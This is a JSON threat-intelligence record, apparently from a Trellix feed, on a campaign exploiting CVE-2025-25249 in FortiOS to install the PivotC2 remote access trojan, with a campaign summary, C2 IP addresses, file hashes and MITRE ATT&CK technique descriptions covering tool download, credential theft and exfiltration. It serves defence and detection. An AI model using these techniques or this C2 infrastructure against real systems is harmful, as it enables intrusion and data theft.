{"campaigns": [{"id": "5d4239ad-babc-47a1-a103-084dba58434d", "threat_level_id": 1, "description": "SOCRadar's Threat Research Unit identified with high confidence active exploitation of CVE-2025-25249, a heap-based buffer overflow vulnerability in FortiOS and FortiSwitchManager's cw_acd daemon, beginning at least July 2026 and ongoing. The exploit binary (fortirun.bin) targets the CAPWAP Control port (UDP 5246) to establish a Node.js reverse shell that downloads and executes PivotC2, a purpose-built Remote Access Trojan for compromised FortiGate appliances. PivotC2 maintains persistent outbound TLS connections to C2 servers and supports interactive shells, file transfers, SOCKS5/HTTP proxy tunneling, port forwarding, CIDR-range scanning, and FortiGate-specific configuration harvesting with automated AES credential decryption. Threat actors targeted more than 30,000 IP addresses, resulting in 178 confirmed PivotC2 infections concentrated in the United States, with two US organizations experiencing full intrusions and confirmed data exfiltration. SOCRadar assesses with high confidence this is a Russian-speaking, financially motivated cybercrime campaign. The RAT's inline comments and usage guidance point toward AI-assisted development, and the recovered version (0.2.3) indicates early-stage tooling.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by SOCRadar and shared publicly https://socradar.io/blog/cve-2025-25249-pivotc2-fortigate-rat/", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://socradar.io/blog/cve-2025-25249-pivotc2-fortigate-rat/"]}, "is_coat": 0, "name": "Exploitation Delivers PivotC2 FortiGate Post-Exploitation RAT (CVE-2025-25249)", "prevalence": {"countries": [{"iso_code": "US", "affected": 1.07, "events": 1.07, "total": 1000000}, {"iso_code": "IT", "affected": 10.08, "events": 40.32, "total": 1000000}], "events": 1.25, "nodes": 0.55, "sectors": [{"sector": "Unknown", "affected": 4.6, "events": 10.51, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip", "value": "46.151.29.58"}, {"type": "ip", "value": "146.103.99.177"}, {"type": "ip_port", "value": "45.138.16.182:9130"}, {"type": "ip_port", "value": "89.217.174.207:9001"}, {"type": "sha256", "value": "2d338ffc8cc80293575c6800c059e33eb41e967907c20ba7687b2231c50837db"}, {"type": "md5", "value": "5923aee7f6e1a5569e9df414295cea2b"}, {"type": "sha1", "value": "caadafe6da9eb3fa1178a220ab4478cfc31a9128"}, {"type": "sha256", "value": "eb4d8aab4e687839c5478a7a3819b0a7a857555ed50fc159c026e99764a0c8a0"}, {"type": "md5", "value": "3b91dd50d48458c19a2853fd7b7e7f4d"}, {"type": "sha1", "value": "e3834ccae5b050151986e4f087d27285cf53ed39"}, {"type": "sha256", "value": "08fa6abac9c132deff4f120a7fcfe5bf17c797b87dbbc3f261d5cf0c077c0a2e"}, {"type": "md5", "value": "10cf40f75e40d3bd9502c3ca45026a29"}, {"type": "sha1", "value": "c43b9b683581926dbceac9e6de4b5f63d8ffbb50"}, {"type": "sha256", "value": "1bf2c5976f2abbe147ae7be140ed69af2c25092f563786400aecd0231229be19"}, {"type": "md5", "value": "3116ce8ec1a4ffc678b3fa46ca7a26ce"}, {"type": "sha1", "value": "72285807ff72a4b23e0ff0bbc711e432512043d6"}, {"type": "sha256", "value": "550f99193f9e90d93b70af1ab050a2d44f1830259ea165568dafc518e761c589"}, {"type": "md5", "value": "0f0f5dd88d460c76402de9759aaced26"}, {"type": "sha1", "value": "bfc619839686dbc437cb626a04479225a0a97a31"}, {"type": "sha256", "value": "c25a27b506fbae62010caf2abff699df5c94d29f056fa7ccfb5f3170d917c8cb"}, {"type": "md5", "value": "56b58bcf65083bf2e640b080aba4de28"}, {"type": "sha1", "value": "153e2ea401df960c1574dcc23e5253920dda82b6"}, {"type": "sha256", "value": "d4911736986cf8affb29106fb8e8b74e00e52d5f762dce9025f2cfe431cf2140"}, {"type": "md5", "value": "67110285a6e71645da5a6cff408b641c"}, {"type": "sha1", "value": "591507981690948fc0e0ff0a022a5136e73e1e95"}, {"type": "sha256", "value": "d99fa14f5e7dfe17e437f167f3f9550ebeda496960710dde81d41748bd7749e4"}, {"type": "md5", "value": "4269a214d2aa7acdcdc0880f674b58f4"}, {"type": "sha1", "value": "f5e86ebdf5b1aab566893e6ac86c2c3a103079a7"}, {"type": "sha256", "value": "fe7da807a2b37a2bbd8c27830a9acc0d86ad8128f38489c493873c7e410c0408"}, {"type": "md5", "value": "89e6288bc012a315ead0b92bc8a45a1e"}, {"type": "sha1", "value": "f851206e96b62e5324fa403aae219dc2a486dddd"}, {"type": "sha256", "value": "cc7f0660d56405cbdff157033d3e35305f063e62efaff6501d11e6a34e7bd151"}, {"type": "md5", "value": "fd9970758e5a84d096ff0b978429b982"}, {"type": "sha1", "value": "86887dc1952c24617c28ac30d55b6ac0f0c950df"}, {"type": "sha256", "value": "a9bea5f89984d47dd60216b0a0b064e8c7e8057e0c10509faa4a2d8d641eb73b"}, {"type": "md5", "value": "2e771c5bbd99d33cc87d98a2fd2b8f44"}, {"type": "sha1", "value": "be07fef25b89d3cd740331708a4a8cd70eea2bff"}, {"type": "sha256", "value": "005e6014fb8fd47249691756f5af3b3d53bfae82df88a71277e53e13fe94cb9f"}], "galaxies": [{"id": "87df7cd8-a378-4c40-a671-3cfd1307cab8", "category": "mitre-attack-pattern", "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n", "created_on": "2024-06-27T21:12:25.000Z", "name": "Artificial Intelligence"}, {"id": "0b438db7-44cb-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", "created_on": "2020-12-23T03:00:42.000Z", "name": "Asymmetric Cryptography"}, {"id": "b5ece41b-1dfa-4ff1-95ec-db9f5965d228", "category": "country", "description": "Bangladesh", "created_on": "2022-05-11T21:15:33.000Z", "name": "bangladesh"}, {"id": "df532e6f-cb6a-46de-92a8-2a7b4d3a70c0", "category": "trellix-tool", "description": "Bash is the GNU Project's shell\u2014the Bourne Again SHell. This is an sh-compatible shell that incorporates useful features from the Korn shell (ksh) and the C shell (csh). It is intended to conform to the IEEE POSIX P1003.2/ISO 9945.2 Shell and Tools standard. It offers functional improvements over sh for both programming and interactive use. In addition, most sh scripts can be run by Bash without modification.\r\n\r\nSource: https://www.gnu.org/software/bash/", "created_on": "2022-03-09T06:16:56.000Z", "name": "Bash"}, {"id": "3f42015e-5f4c-4351-baac-1fe30d91ee0b", "category": "mitre-attack-pattern", "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the \u201cparent-child\" relationship for detection, breaking this relationship could result in the adversary\u2019s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the \u201cdaemon\u201d syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ", "created_on": "2025-05-10T00:14:03.000Z", "name": "Break Process Trees"}, {"id": "b18a5079-d70a-439e-a2eb-2c7daf85293e", "category": "trellix-tool", "description": "BusyBox is an open-source software suite that provides several Unix utilities in a single executable file that was initially released in November 1999. It combines tiny versions of many common UNIX utilities into a single small executable and provides a fairly complete environment for small or embedded system. The author's had dubbed it as \"The Swiss Army Knife of Embedded Linux\" and as single executable replaces basic functions of more than 400 common commands.Threat actors might misuse and try to upload this on Internet of Things (IOT) devices to facilitate further compromise.", "created_on": "2022-11-25T22:14:58.000Z", "name": "BusyBox"}, {"id": "54602d90-50bf-4660-873d-48e67fcf82c6", "category": "country", "description": "Canada", "created_on": "2022-04-05T21:15:08.000Z", "name": "canada"}, {"id": "9dc2bf0e-e1bf-11ea-9477-02d538d9640e", "category": "country", "description": "Chile", "created_on": "2020-08-19T01:59:29.000Z", "name": "chile"}, {"id": "9ed61b06-f7e8-4482-a309-bb1a9e695522", "category": "mitre-attack-pattern", "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary\u2019s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)", "created_on": "2023-03-17T05:12:10.000Z", "name": "Clear Persistence"}, {"id": "8aba4514-3d5c-46a8-ae2e-3f26645c2a1c", "category": "country", "description": "Colombia", "created_on": "2022-04-05T21:15:08.000Z", "name": "colombia"}, {"id": "a605d875-5614-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", "created_on": "2021-01-14T03:00:24.000Z", "name": "Credentials from Password Stores"}, {"id": "33105d0b-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", "created_on": "2020-12-24T03:00:37.000Z", "name": "Credentials In Files"}, {"id": "b4e571ec-b3b2-4857-aabd-017132a613cc", "category": "trellix-cve-database", "description": "A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows attacker to execute unauthorized code or commands via specially crafted packets", "created_on": "2026-09-10T00:11:56.000Z", "name": "CVE-2025-25249"}, {"id": "7401c1a0-1e09-4ea0-97cc-1b4d3e4ebf20", "category": "trellix-tool", "description": "Dash stands for the Debian Almquist shell, a lightweight and highly efficient command interpreter designed to execute scripts with minimal overhead. Because it strictly adheres to POSIX standards, it focuses on speed and minimal resource usage rather than offering complex interactive user features. It is frequently utilized in Linux environments as the default non-interactive system shell to optimize system boot times and streamline background script execution.", "created_on": "2026-09-10T00:11:56.000Z", "name": "dash"}, {"id": "c416f2ea-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Data from Local System"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "bbd2ba02-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)\n\nDNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e.\u202f[Protocol Tunneling](https://attack.mitre.org/techniques/T1572)). The commands may be embedded into different DNS records, for example, TXT or A records.(Citation: OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government) DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices.(Citation: DNS Beacons) Infrequent communication conceals the malicious DNS traffic with normal DNS traffic. ", "created_on": "2020-12-09T03:00:46.000Z", "name": "DNS"}, {"id": "33150d6d-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  ", "created_on": "2020-12-24T03:00:37.000Z", "name": "Domain Account"}, {"id": "83bee48d-f43e-4657-af23-1279c928b86f", "category": "country", "description": "Dominican Republic", "created_on": "2023-02-22T22:17:15.000Z", "name": "dominican republic"}, {"id": "aeddd759-fd26-4ad5-9a59-356196e62972", "category": "mitre-attack-pattern", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "created_on": "2024-05-23T21:13:59.000Z", "name": "Encrypted/Encoded File"}, {"id": "c4976d05-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Exfiltration Over C2 Channel"}, {"id": "bec2126c-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Exfiltration to Cloud Storage"}, {"id": "c35f02b0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Exploit Public-Facing Application"}, {"id": "54045d26-3753-4430-9284-54c172333f7a", "category": "mitre-attack-pattern", "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "created_on": "2022-01-27T22:14:29.000Z", "name": "Exploits"}, {"id": "e4a2505b-604b-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", "created_on": "2021-01-27T03:01:03.000Z", "name": "External Proxy"}, {"id": "c3e4c145-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", "created_on": "2020-02-26T13:49:10.000Z", "name": "File and Directory Discovery"}, {"id": "ea767971-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.", "created_on": "2020-11-20T22:08:27.000Z", "name": "File Deletion"}, {"id": "ce81f788-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:26:17.000Z", "name": "Government, Administration"}, {"id": "395778e0-168b-4fcf-9f82-90f1ca28dca8", "category": "country", "description": "Greece", "created_on": "2022-03-29T05:16:52.000Z", "name": "greece"}, {"id": "3aa35890-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls \u2013a</code> for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdditionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a \u201cspace\u201d character.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", "created_on": "2020-12-04T22:51:21.000Z", "name": "Hidden Files and Directories"}, {"id": "a26ab418-a46b-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-06-02T00:54:38.000Z", "name": "Infrastructure"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "0b389e29-44cb-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", "created_on": "2020-12-23T03:00:42.000Z", "name": "Internal Proxy"}, {"id": "7b1b0ec1-061f-4e07-8f01-014d4b1bd983", "category": "country", "description": "Israel", "created_on": "2021-08-10T12:07:24.000Z", "name": "israel"}, {"id": "dd2ee04e-3a67-11eb-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-12-09T21:45:33.000Z", "name": "IT - Security"}, {"id": "db3f5146-6e39-4108-87fa-3e932f52e84d", "category": "trellix-tool", "description": "JavaScript, often abbreviated as JS, 